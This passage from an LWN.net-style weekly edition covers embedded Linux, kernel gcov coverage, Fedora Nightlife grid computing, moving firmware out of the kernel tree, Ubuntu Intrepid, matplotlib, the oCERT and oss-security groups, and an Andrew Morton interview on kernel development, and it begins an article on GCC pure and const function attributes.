than many people seem to realise. I mentioned XIP earlier; can you also
guess who was first to implement tickless support?

A lot of the problem has been people who show up and throw their code
over the wall, then run away. Or worse, those who don't even throw it
over the wall at all. People seem to have forgotten how long it took us
to educate the enterprise vendors and get them to work nicely with us;
we're a bit behind the curve on the embedded side but we're getting
there. And organisations like CELF are doing good work on that front,
too.


Paul: We have to be realistic.  There will always be some features
that either
are too invasive to be sensible merge candidates, or the particular
feature has such a small user base, that it may not make sense from
a carrying cost point of view to target it for inclusion in the standard
kernel.  Fortunately, I think the Linux developer community at large has
generally been flexible in accommodating most things, while at the same
time
excluding things where the best interest of the kernel as a whole needed
to come first.

In such cases where a feature doesn't look to be a probable merge
candidate,
not all is lost.  We have to capitalize on the remaining value adds that
come
with still working with it as if it was a merge candidate.  Things like
cherry-picking parts of it that are of global value and thus reducing the
carrying cost.  Or being able to voice an opinion at the appropriate time
if
the maintainer of the feature notices that a proposed change somewhere else
in
the kernel will impact the feature that they have been maintaining
independently.  So I think we still want to work towards getting the people
handling these "harder" features of interest to the embedded community
working
more in parallel with the main kernel community.


LWN: The term "embedded Linux" covers a huge spectrum of devices and
uses 
of Linux, everything from devices where the OS is completely invisible 
up through internet tablets and UMPC devices that are essentially 
desktops squeezed into a smaller package.  Where on that spectrum do 
your interests lie?  What do you think the challenges of trying to 
support all of those different uses will be?


David: My interest is everywhere in that spectrum—and beyond. Too
much focus
on one small area is the way to ensure that you solve your own problems
while pessimising things for other people. I think it's important to
keep a certain amount of holistic focus, because that's how we can make
sure that Linux scales well both up and down.


Paul: Absolutely.  It seems that people naturally associate embedded
with the
small and resource constrained end of the scale.  But the reality is that
there are people who are wanting to use Linux in embedded applications
where
the baseline hardware has 16 cores and gigabytes of memory.  On the one
end of the scale you are interested in things like efficiency of resource
usage, quick boot times, and on the other end of the scale, your interests
are more likely around features relating to specific high availability 
features that may not be present in the standard kernel tree.

These are clearly separate problem spaces, but the common thing they both
share is that you've got a group using a specific piece of hardware with a
specific use case in mind.  This tends to bring out the "works for us, lets
get
it done and shipping" mentality, and the work tends to never make it out to
where others can review it and look at merging bits that make sense.  I'm
hoping this is where we can make a difference.


We would like to thank David and Paul for taking time to answer these
questions.

		Profiling kernel code coverage


Measuring which lines of code get executed and how often can be a useful
tool for debugging or testing.  That capability has long been
available for user space programs in the form of gcov.  A recent
patch seeks to allow kernel
hackers access to the same tool.


There are three main components to making gcov work with the kernel: changing
the build to add the -fprofile-arcs -ftest-coverage gcc flags,
hooking up the gcc-generated code to record the coverage information, and
providing a way for the kernel to output the data to user space.
The GCOV_PROFILE kconfig option governs whether to include gcov
into the build, while GCOV_PROFILE_ALL activates profiling for the
entire kernel.  If desired, individual directories and files can be
selectively included or excluded from being instrumented.


The new kernel/gcov directory contains the necessary functions to
support the gcc-generated profiling code.  This includes handling
statically linked kernel code as well as kernel modules that are loaded.
Information gathered from code in modules can be either preserved or
discarded when they are unloaded.  This will allow analysis of the module
unloading path that could be useful for detecting resource leaks or other
problems in that process.


A user space program compiled for gcov
will write a binary file to the filesystem for each source file that contains the 
data corresponding to the execution path through that file.  The kernel
needs to do that differently, so instead it writes to a file in debugfs.
Each source file that is compiled for gcov will store its information in
/sys/kernel/debug/gcov/path/file.gcda, where
/sys/kernel/debug is the debugfs mount point and path is
the path to the file in the kernel tree.  The individual .gcda
files can also be written to, which will result in setting the
accumulated data for that source file back to zero.


Once the data has been gathered, 
gcov can be invoked to
produce a file that annotates the source showing each line with the number
of times it 
has been executed.  LCOV is a graphical
tool that can also be used to examine the coverage information.  LCOV and
the gcov kernel patches both come from the Linux Test Project which has an
extensive kernel test suite and is using gcov to expand the coverage of
their tests.


As part of the patch set, the seq_file interface has been
extended to allow writing of arbitrary binary data to a virtual file.
Currently, 
the seq_file interface is somewhat character oriented, so a function has
been added to fs/seq_file.c to provide that ability:

As the prototype implies, it writes len bytes from
data to the seq_file seq. 


Efforts to get gcov support into the kernel have been around since
2002, 
but the code was recently rewritten to be a better fit for recent
kernels. In the patch, Peter Oberparleiter says "due to regular
requests, I rewrote the gcov-kernel patch from scratch so that it
would (hopefully) be fit for inclusion into the upstream kernel."
One of the bigger changes is to move the user space interface for gcov from
/proc into debugfs. 


It seems that the technical issues have largely been addressed in the third
version of the gcov patch.  It can provide useful information, especially for
increasing the reach of test coverage—something that can only help
reduce kernel bugs—so it could make for a nice kernel addition.
Whether it will be picked up into linux-next or 
-mm and pushed towards an eventual mainline merge remains to be seen.


		Fedora harnesses the power of idle computers with Nightlife


Bryan Che, a member of the product management team at Red Hat, recently
introduced Fedora
Nightlife, a project he hopes will motivate people to donate their
computer's downtime to processing data for scientific research and other
socially beneficial work. The heavy lifting will be done by the University
of Wisconsin-Madison's Condor
workload management system which will be responsible for the scheduling and
logistics of donated computer power and, in the end, Che hopes to build a
network of more than a million nodes of Fedora systems to help process data
for everything from Web-indexing projects to medical research. 
"[W]e have begun talking with the guys over at Wikia about helping them index the Web
for their open source search engine," says Che. "It would be great if we
could help with tasks for the Fedora infrastructure team at some point with
things like automated builds or tests. There is a lot of scientific
research that requires lots of computing power, and there are lots of
students who could use access to a grid for research. I'd love to have all
sorts of projects like these participate."
Che says that the scope and type of projects that join will largely be
dictated by the community, and he's hoping to draw on its collective
expertise to "shape Nightlife into a useful community service." His end
goal, however, isn't just to make computer resources available but to also
develop a basis for larger infrastructure projects. Che notes, "For
example, much of the high performance computing (HPC) jobs these days are
done on Linux — and particularly Fedora or Red Hat. This puts us in a
prime position to be able to shape and build out an entire open source
stack for research computing on grids. Today, many people depend upon
proprietary (and often costly) libraries for their scientific research or
even enterprise computing. Nightlife will provide us a great forum to
engage these users to see what are their needs and provide them with a
fully open source solution that they can use for their valuable
research."
Naturally, security is of primary importance when individual computers
are clustered together or outside data is inserted into a system for
processing. Che says the Nightlife team takes security very seriously and
has a number of measures in place to protect users' computers and ensure
the application code is safe as well.
"[W]e will require that projects that want to leverage Nightlife must
distribute their packages and source code through Fedora," explains
Che. "This will allow us to inspect what the applications are doing and
make sure there isn't anything malicious. On the execution side, one of the
capabilities that we've added to Condor recently is integration with our
libvirt virtualization technology. This will enable people to execute
Nightlife jobs entirely within a virtual machine bubble that is shielded
from their physical computers.
"We are also looking at taking advantage of SELinux technology, which we've
developed with the NSA, as a mechanism for
tightly locking down jobs so that they can only perform tasks for which
they are explicitly granted permission."
Che is quick to point out that although Fedora has committed plenty of
resources to Nightlife, it is not Fedora-specific — indeed it's not
even Linux-specific. Since Condor supports executing processes on many
different platforms, Mac OS, Windows, Unix, and Linux distributions of any
flavor are capable of donating resources. Not all features will be
available on non-Linux platforms, however, if they lack certain underlying
technologies. For instance, Windows lacks a built-in hypervisor for running
virtual environments and doesn't support SELinux for lock-downs.
"I would welcome anyone to donate spare capacity to Nightlife [and] I'd
hope that people from all sorts of platforms join us," encourages
Che. "[T]here isn't any reason why other communities couldn't participate
with us and even start adding some of these capabilities to a Nightlife
client for their platforms. From a development standpoint, the upstream
code lives in the Condor project at the University of Wisconsin. So, anyone
can contribute at that project as well without having any involvement with
Fedora."
When the project was announced last week, some community
members were puzzled as to why Fedora chose to use Condor instead of BOINC, a similar
project developed by University of California-Berkeley. Che points out
that, though the two efforts have a lot in common, they each have an
entirely different focus. He says BOINC's mission is "very much focused on
enabling desktops/laptops to provide computing capacity as part of a larger
grid [while] Condor is more general-purpose; it can take idle capacity and
utilize it well, but it is primarily a good resource scheduler for
dedicated grids."
While some people's comparisons of Condor and BOINC focus on the
technology behind the projects, others see similarities between the Condor
and Nightlife projects themselves. In actuality, they are really quite
different. "Condor's client can use a BOINC client to process data as
backfill (when there are no other jobs to run)," notes Che. "So, there is
no need to view these projects as competitive. Indeed, one possibility is
to use Nightlife to increase the number of machines participating in
BOINC." Of course, a low barrier to entry is also important for widespread
adoption of Nightlife. Since many enterprises and researchers already run
Condor for their dedicated grids, Che says it was a logical choice for the
project.
Dr. Keith Laidig can easily see the intrinsic value of Nightlife and how
it will benefit the scientific community at large. He runs the computing
infrastructure for the computational biophysics group in the Department of
Biochemistry at University of Washington, and regularly relies on outside
computing power to crunch data for researchers. Under the direction of
Professor David Baker, about four years ago the group created Robetta, an automated prediction
server that farms out work to other systems via Condor which has proven
"quite successful at keeping the wait times [for research results] down to
the range of 'months'."
Laidig recently told
the Nightlife community, "If we had access to more computing power,
even that available from modest periods of inactivity, we could put that
power to work to address many pressing issues in bio-medical research such
as HIV/AIDS vaccine design, improvement of existing drugs and/or design new
drugs, and creation of new methods to harness biology to address issues
such as carbon sequestration."

As Laidig explained to LWN, reducing the wait times for results to even
a matter of weeks is not out of the question. "Given sufficient computing
power, the processing time would drop even further. In principle, the
processing could take a day or less — depending on computing power,
queue depth, etc."
Laidig says it's hard to estimate just how much donated computer access
his lab would need in order to see an appreciable rise in research
turn-around time, but he estimates they currently use around 300 - 400
processors running around the clock to maintain the current work
flow. "Should we gain, say, 1,500 machines that could work for 8
hours... we'd be matching that — taking into account overhead. Now,
I'd like to increase that by a factor of ten or more."
Though he would be happy to see Nightlife flourish, Laidig notes there
are some things to consider before committing your computer's resources to
the project. "Not to throw a wet blanket on things, but [there are] issues
that folks should keep in mind. Their gear would be using electricity and
generating heat. There are also network bandwidth considerations as well
— some data-sets necessary to undertake distributed work can be
sizable (100 MBs) which can soak up resources. There's the local disk space
usage, too.
"Folks should be made aware of the 'costs' of contributing. Then, should
their desire to contribute outweigh the costs, they should join up!"
Some community members have indeed expressed concerns about the
energy consumption associated with idling computers and suggest that the
ecological harm of running the CPUs and fans of an unattended machine
outweighs the benefit of charity in the name of science. In response to an
animated discussion about Nightlife at Slashdot, one enterprising
commenter tested how much energy his idle computer uses and discovered
it was upwards of $70 per year. Che responded
to the criticism by acknowledging that although cycle harvesting can be
viewed as a "waste of energy," it can, in fact, save energy in the
long run. In addition to the notion that energy to process data will
eventually be used at some point or another anyway, Nightlife also
distributes energy consumption over a wide geographical area, thereby
reducing the overall energy burden on a single data center or location.
Future plans for Nightlife include making it a first-boot option for
Fedora so when a user does a fresh install, they are prompted to donate
computer power to the project. Of course, before Che can attain his
million-node goal, there are several smaller goals to accomplish along the
way. "At the earliest, we wouldn't be able to start reaching numbers at
this level until after Fedora 10 — and that's probably pushing
it."

		Moving the firmware out


It seems that David Woodhouse had a bit of an ulterior motive when he recently
reworked the kernel firmware
loader.  That is not to say the work is not useful in its own right,
but one of his goals is more apparent now: removing all of the firmware
from the 
kernel source tree.  By making it easy to separate the firmware
blobs—while still allowing them to be statically built into
kernels—he has provided a possible path for all firmware needed by
any Linux driver to live in a single place.


The firmware issue is somewhat contentious, with licensing and political
issues that tend to annoy the kernel developers.  Arguments about the
"legality" of distributing firmware with the kernel flare up from time to
time.  Separate from that, there are some good reasons why it makes sense
to keep the firmware in its own place: some distributions need or want to
distribute their kernels without firmware blobs and some hardware
manufacturers will not allow their firmware to be distributed with the
kernel because of concerns about the GPL.  The current situation makes it
harder for both users and distributors.


Woodhouse brought up the idea of pulling the firmware out of the kernel in
a post to linux-kernel and
ksummit-2008-discuss.  The agenda for this year's Kernel Summit is
under discussion, so he proposed that it be discussed there.  He is clearly
trying to anticipate the technical concerns that others might have:

 By the time the kernel summit comes around, we should have made decent
progress on moving _all_ the firmware blobs to the firmware/ directory.
And at that point I'd like to remove them completely, to a separate git
tree and tarball. Those who really want to build them in to their static
kernel would still be able to, but it wouldn't be the default behaviour.


Unsurprisingly, there are some fairly strenuous objections.  David Miller
is quite annoyed:


Sorry, that's taking things too far.  I've fought, like, forever, to
keep the tg3 driver with it's firmware in-tree.  I refuse to let the
driver get broken like that, it's staying working, and that means
in-tree and linked into the driver.

If debian or whoever else have these concerns and want to rip the
firmware out, it is one hundred percent their problem to patch things
out of the kernel tree they use.


But there are other reasons to collect firmware in one single place, as
Arjan van de Ven notes:

Right now it's a royal pain for users to get all the right pieces of
firmware.... having ONE place to put all that would go a long way of making
that
side of things easier.

If you want to argue that that should be in the kernel tarball itself, you
won't
hear me complain. But others will... and for that a 2nd tarball might well
be the answer.
Just we shouldn't need 100 tarballs.

There is a very real concern, though, that putting firmware without source
into the kernel is a GPL violation.  It is impossible to know for sure
without a court decision, which is something that no one wants to have to
deal with.  Companies—and their lawyers—tend to be very
conservative when it comes to inviting lawsuits, so removing unrelated,
possibly actionable code from the kernel sources is of great benefit to
them.  As Woodhouse says:

And it isn't just the nutters. Fedora also wants to ship the firmware in
a separate package from the kernel -- since the alleged GPL violation is
such a _gratuitous_ risk given that we always use an initrd anyway, and
because people want to be able to do 'Free' spins which don't feature
the firmware at all, even in the source packages.


By making it easier to put all of the firmware in one non-GPL tree,
hardware vendors—and their lawyers—may be willing to
allow the firmware to be distributed.  If Woodhouse's plan for supporting
both compile-time and runtime loading of the firmware is successful and
reasonably transparent, there
should be little difference for kernel developers, but big improvements for
users and distributors.  It is unclear whether this is something that will
be resolved in email, as Woodhouse hopes, or will require a discussion at
the Kernel Summit in September, but it's an idea with a lot of merit that
may find its way into the mainline at some point.


		What's up with the Intrepid Ibex


The ibex is type of wild mountain goat with large recurved horns that are
transversely ridged in front, found in Eurasia, North Africa, and East
Africa.  That is the Wikipedia
definition.  For the Ubuntu community, the Intrepid Ibex is the next
version of the operating system, and the topic under discussion at the
recent Ubuntu Developer
Summit (UDS) in Prague.

There are a number of YouTube videos from the
UDS, with Mark Shuttleworth and others talking about Intrepid Ibex and
related topics.  Mark's two part video covers the various versions of
Ubuntu from the server to the platform specific remixes, to collaboration
with other distributions and upstream developers, and more.

The Intrepid Ibex, scheduled for release next October, will also be known
as version 8.10 - 8 for the year and 10 for the month of its release.  With
the Hardy Heron, Ubuntu's second LTS (Long Term Support) release out the
door, the Ibex marks the beginning of a new LTS cycle.  As such, it is
likely to be a bit wild and woolly.  A time to bring in new technology and
experiment with possibilities.  There will be plenty of time later for
stabilizing the next LTS release, Ubuntu 10.04 LTS, scheduled for release in
April 2010.

This UDS had several tracks some reports are available:

 Community
 looks at getting the community involved in a helpful way
  Server looks
 at improving Ubuntu as a server distribution
  Platform
 covers 3G networking, the Education Edition, Firefox KDE integration, Boot
 performance and more
  QA looks at how to measure quality,
 and bug tracking issues
  the Desktop
 points to several other wiki documents dealing with single sign on, Compiz
 and other desktop topics.

ItWire takes a
look at the new features planned for Ubuntu's Intrepid Ibex and hopes
for improved wireless networking.
"Two key design goals were announced from the beginning. Firstly, the
user interaction model will be re-engineered to ensure Ubuntu works as well
as responsively as possible on hardware ranging from squinty little
subnotebooks through to high-end powerful workstations. Secondly, and the
one on my mind, is the goal of pervasive internet access. Ubuntu have
explicitly stated they wish this release of Ubuntu - finally - to tap into
bandwidth wherever you may be. Once more the goat metaphor comes to the
fore, "No longer will you need to be a tethered, domesticated animal -
you'll be able to roam (and goats do roam!) the wild lands and access the
web through a variety of wireless technologies. We want you to be able to
move from the office, to the train, and home, staying connected all the
way.""

Cody Somerville, leader of Xubuntu, tells us Why Xubuntu Intrepid is going to
rock.  The Xubuntu
Intrepid Strategy document contains a clear mission statement and takes
a deeper look at this variant:

Xubuntu will provide (The goal of Xubuntu is to produce) an easy to use
distribution, based on Ubuntu, using Xfce as the graphical desktop, with a
focus on integration, usability and performance, with a particular focus on
low memory footprint. The integration in Xubuntu is at a configuration
level, a toolkit level, and matching the underlying technology beneath the
desktop in Ubuntu. Xubuntu will be built and developed autonomously as part
of the wider Ubuntu community, based around the ideals and values of
Ubuntu.


Kubuntu fans will find this entry in Jonathan Riddell's
blog of interest.  "Kubuntu Intrepid Version makes the decision
to move to KDE 4 by default (anything else is history). KDE 3 libs will
still be available for applications without a KDE 4 version, but the
desktop won't be. It's a good time to move to KDE 4 since Intrepid is
intended to be a more cutting edge release."  The Kubuntu Intrepid
wiki takes a look at some specific design goals the KDE variant.  Some of
the defaults
for Kubuntu have been defined.

We will remove sounds for actions. Actions do not need to attract the
user's attention. We would like a new, shorter, login sound, Scott Wheeler
has volunteered to make one.

At the 4.1 release we will consider which default Plasmoids to include. The
Desktop Plasmoid should be on by default.
 And so on.

Other goals for Intrepid are still somewhat fuzzy, which means there is
still time to make proposals for what you want.  If you run Ubuntu (or
variant thereof) but it's not quite what you want it to be, get involved and
help make it better.

		Matplotlib announces a major release


Matplotlib
is a cross-platform numerical plotting and analysis library for Python:


matplotlib is a python 2D plotting library which produces publication quality figures in a variety of hardcopy formats and interactive environments across platforms. matplotlib can be used in python scripts, the python and ipython shell (ala matlab or mathematica), web application servers, and six graphical user interface toolkits.
matplotlib tries to make easy things easy and hard things possible. You can generate plots, histograms, power spectra, bar charts, errorcharts, scatterplots, etc, with just a few lines of code.


Matplotlib version 0.71 was last
examined on LWN
in January, 2005.  Recently, major release version 0.98.0 was
announced:


matplotlib 0.98.0 is a major release which requires python2.4 and numpy 1.1. It contains significant improvements and may require some advanced users to update their code; see
migration
and
API_CHANGES.
We are supporting a maintenance branch of the older code available at matplotlib 0.91.3.


The major changes in matplotlib 0.98.0 include a complete rewrite of the
transformation infrastructure and new support for user-defined
transformations and projections.  The full list of changes is
available in the
CHANGELOG file.
The new matplotlib release coincides with the
new release
(version 1.1.0) of NumPy,
the fundamental package needed for scientific computing with Python:


"This is the first minor release since the 1.0 release in
October 2006. There are a few major changes, which introduce
some minor API breakage. In addition this release includes
tremendous improvements in terms of bug-fixing, testing, and
documentation."

<!-- LWNPutAdHere -->

Looking forward to upcoming and in-progress matplotlib development, the
Goals
document explains a number of new matplotlib capabilities that are in
the planning and development stages.


If you need to create any number of scientific data plots,
matplotlib is an excellent choice for the job.  It truly lives
up to the claim of being easy to use.
The latest matplotlib source code is available for download

here.


		oCERT and oss-security


Two recently announced organizations, the Open Source Computer Emergency Response
Team (oCERT) and Open Source Software
Security (oss-security), are both looking to assist projects with
security issues in a complementary way.  Each is focusing on different kinds
of problems that free software projects face when trying to secure
their code. 


oCERT is modeled on the various national CERT organizations, but focused on
free software:

The service aims to help both large infrastructures, like major
distributions, and smaller projects that can't afford a full-blown security
team and/or security resources. This means aiding coordination between
distributions and small project contacts. The goal is to reduce the impact
of compromises on small projects with little or no infrastructure security,
avoiding the ripple effect of badly communicated or handled compromises,
which can currently result in distributions shipping code which has been
tampered with. 


In addition, oCERT is doing vulnerability research on free software
projects.  So far, they have released four
advisories after coordinating with the affected projects and
distributions.  It is a way for team members—or anonymous
researchers—to collect their vulnerability research and push it
through the process.  


The oCERT team
consists of five security professionals from Inverse Path, Google, and
Intel, along with a two-person advisory board.  Various projects have also
signed up as members including several Linux distributions, security and
other free software tools, as well as OpenBSD.  In order to become a
member, an project or organization must meet some fairly stringent membership requirements
that include agreeing to the disclosure policy.  Others can submit
vulnerability information without becoming a member.


oss-security is more of an open group, without any formal membership, that
is looking to foster more discussion of security issues:

The purpose of oss-security is to encourage public discussion of security
flaws, concepts, and practices in the open source community.  We don't want
to simply be an information clearinghouse, or to replace any of the current
security lists and groups.  The goal is to fill an existing vacuum by
encouraging active participation of those interested in the ideas and
unique challenges in securing Open Source software.  This includes
activities such as flaw discovery, understanding, reporting, and overall
best practices.


The oss-security
mailing list is one of the focal points of the group's efforts.  Some of
the topics currently being discussed are helping projects with code
reviews, getting CVE IDs assigned for specific vulnerabilities, and the
IP address change of the "L" root nameserver.


The oss-security wiki
seeks to gather relevant security information from projects and vendors in
a single location.  This includes security contacts, helpful mailing lists,
bug tracker locations, distribution security patch repositories, and the
like.  If it gets fully populated and is kept up-to-date, it will be a
tremendous resource for the community. 


Up to a certain point, more organizations looking to improve free software
security can only be a good thing.  Each of these seems to have a focus
that is not met by existing groups, so they can hopefully fill a need in the
community.  The private, vendor-sec
mailing list has long been used by distributors, whereas oCERT and
oss-security are more focused on the project side of the equation.  With
luck, that will lead to better code and more coordination for projects
and distributions.  


		Andrew Morton on kernel development


Andrew Morton is well-known in the kernel community for doing a wide
variety of different tasks: maintaining the -mm tree for patches that may be
on their way to the mainline, reviewing lots of patches, giving
presentations about working with the community, and, in general, handling
lots of important and visible kernel development chores.  Things are
changing in the way he does things, though, so we asked him a few questions
by email.  He responded at length about the -mm tree and how that is
changing with the advent of linux-next, kernel quality, and what folks can
do to help make the kernel better.


Years ago, there was a great deal of worry about the possibility of burning
out Linus.  Life seems to have gotten easier for him since then; now
instead, I've heard concerns about burning out Andrew.  It seems that you
do a lot; how do you keep the pace and how long can we expect you to stay
at it?


I do less than I used to.  Mainly because I have to - you can't do
the same thing at a high level of intensity for over five years and
stay sane.

I'm still keeping up with the reviewing and merging but the -mm release
periods are now far too long.

There are of course many things which I should do but which I do not.

Over the years my role has fortunately decreased - more maintainers are
running their own trees and the introduction of the linux-next tree
(operated by Stephen Rothwell) has helped a lot.

The linux-next tree means that 85% of the code which I used to
redistribute for external testing is now being redistributed by
Stephen.  Some time in the next month or two I will dive into my
scripts and will find a way to get the sufficiently-stable parts of the
-mm tree into linux-next and then I will hopefully be able to stop
doing -mm releases altogether.

So.  The work level is ramping down, and others are taking things on.


What can we do to help?


I think code review would be the main thing.  It's a pretty specialised
function to review new code well.  The people who specialise in the
area which the new code is changing are the best reviewers but
unfortunately I will regularly find myself having to review someone
else's stuff.

Secondly: it would help if people's patches were less buggy.  I still
have to fix a stupidly large number of compile warnings and compilation
errors and each -mm release requires me to perform probably three or
four separate bisection searches to weed out bad patches.

Thirdly: testing, testing, testing.

Fourthly: it's stupid how often I end up being the primary responder on
bug reports.  I'll typically read the linux-kernel list in 1000-email
batches once every few days and each time I will come across multiple
bug reports which are one to three days old and which nobody has done
anything about!  And sometimes I know that the person who is
responsible for that part of the kernel has read the report.  grr.  


Is it your opinion that the quality of the kernel is in decline?  Most
developers seem to be pretty sanguine about the overall quality problem.
Assuming there's a difference of opinion here, where do you think it comes
from?  How can we resolve it?


I used to think it was in decline, and I think that I might think that
it still is.  I see so many regressions which we never fix.  Obviously
we fix bugs as well as add them, but it is very hard to determine what
the overall result of this is.

When I'm out and about I will very often hear from people whose
machines we broke in ways which I'd never heard about before.  I ask
them to send a bug report (expecting that nothing will end up being
done about it) but they rarely do.

So I don't know where we are and I don't know what to do.  All I can do
is to encourage testers to report bugs and to be persistent with them,
and I continue to stick my thumb in developers' ribs to get something
done about them.

I do think that it would be nice to have a bugfix-only kernel release. 
One which is loudly publicised and during which we encourage everyone
to send us their bug reports and we'll spend a couple of months doing
nothing else but try to fix them.  I haven't pushed this much at all,
but it would be interesting to try it once.  If it is beneficial, we
can do it again some other time.


There have been a number of kernel security problems disclosed recently.
Is any particular effort being put into the prevention and repair of
security holes?  What do you think we should be doing in this area?


People continue to develop new static code checkers and new runtime
infrastructure which can find security holes.

But a security hole is just a bug - it is just a particular type of
bug, so one way in which we can reduce the incidence rate is to write
less bugs.  See above.  More careful coding, more careful review, etc.

Now, is there any special pattern to a security-affecting bug?  One
which would allow us to focus more resources on preventing that type of
bug than we do upon preventing "average" bugs?  Well, perhaps.  If
someone were to sit down and go through the past five years' worth of
kernel security bugs and pull together an overall picture of what our
commonly-made security-affecting bugs are, then that information could
perhaps be used to guide code-reviewers' efforts and code-checking
tools.

That being said, I have the impression that most of our "security
holes" are bugs in ancient crufty old code, mainly drivers, which
nobody runs and which nobody even loads.  So most metrics and
measurements on kernel security holes are, I believe, misleading and
unuseful.

Those security-affecting bugs in the core kernel which affect all
kernel users are rare, simply because so much attention and work gets
devoted to the core kernel.  This is why the recent splice bug was such
a surprise and head-slapper.


I have sensed that there is a bit of confusion about the difference between
-mm and linux-next.  How would you describe the purpose of these two trees?
Which one should interested people be testing?


Well, things are in flux at present.

The -mm tree used to consist of the following:


80-odd subsystem maintainer trees (git and quilt), eg: scsi, usb,
net.
various patches which I picked up which should be in a subsystem
  maintainer's tree, but which for one of various reasons didn't get
  merged there.  I spend a lot of time acting as backup for leaky
  maintainers.
patches which are mastered in the -mm tree.  These are now
  organised as subsystems too, and I count about 100 such subsystems
  which are mastered in -mm.  eg: fbdev, signals, uml, procfs.  And
  memory management.
more speculative things which aren't intended for mainline in the
  short-term, such as new filesystems (eg reiser4).
debugging patches which I never intend to go upstream.


The 80-odd subsystem trees in fact account for 85% of the changes which
go into Linux.  Pretty much all of the remaining 15% are the only-in-mm
patches.

Right now (at 2.6.26-rc4 in "kernel time"), the 80-odd subsystem trees
are in linux-next.  I now merge linux-next into -mm rather than the
80-odd separate trees.

As mentioned previously, I plan to move more of -mm into linux-next -
the 100-odd little subsystem trees.

Once that has happened, there isn't really much left in -mm.  Just

the patches which subsystem maintainers leaked.  I send these to
  the subsystem maintainers.
the speculative not-for-next-release features
the not-to-be-merged debugging patches.


Do you have any specific goals for the development of the kernel over the
next year or so?  What would they be?


Steady as she goes, basically.

I keep on hoping that kernel development in general will start to
ramp down.  There cannot be an infinite number of new features
out there!  Eventually we should get into more of a maintenance
mode where we just fix bugs, tweak performance and add new
drivers.  Famous last words.

And it's just vaguely possible that we're starting to see that
happening now.  I do get a sense that there are less "big" changes
coming in.  When I sent my usual 1000-patch stream at Linus for 2.6.26
I actually received an email from him asking (paraphrased) "hey,
where's all the scary stuff?"


In the early-May discussions, Linus said a couple of times that he does not
think code review helps much.  Do you agree with that point of view?


Nope.


How
would you describe the real role of code review in the kernel development
process?


Well, it finds bugs.  It improves the quality of the code. 
Sometimes it prevents really really bad things from getting into
the product.  Such as rootholes in the core kernel.  I've spotted
a decent number of these at review time.

It also increases the number of people who have an understanding
of the new code - both the reviewer(s) and those who closely
followed the review are now better able to support that code.

Also, I expect that the prospect of receiving a close review will
keep the originators on their toes - make them take more care
over their work.


There clearly must be quite a bit of communication between you and Linus,
but much of it, it seems, is out of the public view.  Could you describe
how the two of you work together?  How are decisions (such as when to
release) made?


Actually we hardly ever say anything much.  We'll meet
face-to-face once or twice a year and "hi how's it going".

We each know how the other works and I hope we find each other
predictable and that we have no particular issues with the
other's actions.  There just doesn't seem to be much to say,
really.


Is there anything else you would like to say to LWN's readers?


Sure.  Please do contribute to Linux, and a great way of doing that is
to test latest mainline or linux-next or -mm and to report on any
problems which you encounter.

Nothing special is needed - just install it on as many machines
as you dare and use them in your normal day-to-day activities.

If you do hit a bug (and you will) then please be persistent in
getting us to fix it.  Don't let us release a kernel with your
bug in it!  Shout at us if that's what it takes.  Just don't let
us break your machines.

Our testers are our greatest resource - the whole kernel project
would grind to a complete halt without them.  I profusely thank
them at every opportunity I get :)


We would like to thank Andrew for taking time to answer our questions.

		Implications of pure and constant functions


Introduction
Attributes and why you should use them

      Free Software development is often a fun task for developers,
      and it is its low barrier to entry (on average) that makes it
      possible to have so much available software for so many
      different tasks. This low barrier to entry, though, is also
      probably the cause of the widely varying quality of the code of
      these projects.
    
      Most of the time, the quality issues one can find are not
      related to developers' lack of skill, but rather to lack of
      knowledge of how the tools work, in particular, the
      compiler. For non-interpreted languages, the compiler is
      probably the most complex tool developers have to deal
      with. Because a lot of Free Software is written in C, GCC is
      often the compiler of choice.
    
      Modern compilers are also supposed to do a great job at
      optimizing the code by taking code, often written with
      maintainability and readability in mind, and translating it into
      assembler code with a focus on performance. Code analysis for
      optimization (which is also used for warnings about the code)
      has the task of taking a semantic look at the code, rather than
      syntactic, and identifying various fragments of algorithms that
      can be replaced with faster code (or with code that uses a
      smaller memory footprint, if the user desires to do so).
    
      This task is a pretty complex one and relies on the compiler
      knowing about the function called by the code. For instance, the
      compiler might know when to replace a call to a (local, static)
      function with its body (inlining) by
      looking at its size, the number of times it is called, and its
      content (loops, other calls, variables it uses). This is because
      the compiler can give a semantic value to the code for a
      function, and can thus assess the costs and benefits of a
      particular transformation at the time of its use.
    
      I specified above that the compiler knows when to
      inline a function by looking at its
      content. Almost all optimizations related to function calls work
      this way: the compiler, knowing the body of a function, can
      decide when it's the case to replace a call with its body; when
      it is possible to completely avoid calling the function at all;
      and when it is possible to call it just once and thereby
      avoid multiple calls. This means, though, that these
      optimization can be applied only to functions that are defined
      in the same unit wherein they are used. These functions are
      usually limited to static functions (functions that are not
      defined as static can often be overridden both at link time and
      runtime, so the compiler cannot safely assume that what it finds
      in the unit is what the code will be calling).
    
      As this is far from optimal, modern compilers like GCC provide a
      way for the developer to provide information about the semantics
      of a function, through the use of
      attributes attached to declarations of
      functions and other symbols. These attributes provide
      information to the compiler on what the function does, even
      though its body is not available. Consequently, the compiler can
      optimize at least some of its calls.
    
      This article will focus on two particular attributes that GCC
      makes available to C developers: pure and
      const, which can declare a function as
      either pure or
      constant. The next section will provide a
      definition of these two kinds of functions, and after that I'll
      get into an analysis of some common optimizations that can be
      performed on the calls of these functions.
    
      As with all the other function attributes supported by GCC and
      ICC, the pure and
      const attributes should be attached to the
      declarative prototype of the function, so that the compiler know
      about them when it finds a call to the function even without its
      definition. For static functions, the attribute can be attached
      to the definition by putting it between the return type and the
      name of the function:
    Pure and Constant Functions
      For what concerns the scope of this article, functions can be
      divided into three categories, from the smallest to the biggest:
      constant functions, pure
      functions and the remaining functions can be called
      normal functions.
    
      As you can guess, constant functions are also pure functions,
      but pure functions cannot be not all pure functions are constant
      functions. In many ways, constant functions are a special case
      of pure functions. It is, therefore, best to first define pure
      functions and how they differ from all the rest of the
      functions.
    
      A pure function is a function with basically no
      side effect. This means that pure functions return a value that
      is calculated based on given parameters and global memory, but
      cannot affect the value of any other global variable. Pure
      functions cannot reasonably lack a return type
      (i.e. have a void return type).
    
      GCC documentation provides strlen() as an
      example of a pure function. Indeed, this function takes a pointer
      as a parameter, and accesses it to find its length. This
      function reads global memory (the memory pointed to by
      parameters is not considered a parameter), but does not change
      it, and the value returned derives from the global memory
      accessed.
    
      A counter-example of a non-pure function is the
      strcpy() function. This function takes two
      pointers as parameters. It accesses the latter to read the
      source string, and the former to write to the destination
      string. As I said, the memory areas pointed to by the parameters
      are not parameters on their own, but are considered global
      memory and, in that function, global memory is not only accessed for
      reading, but also for writing. The return value derives directly
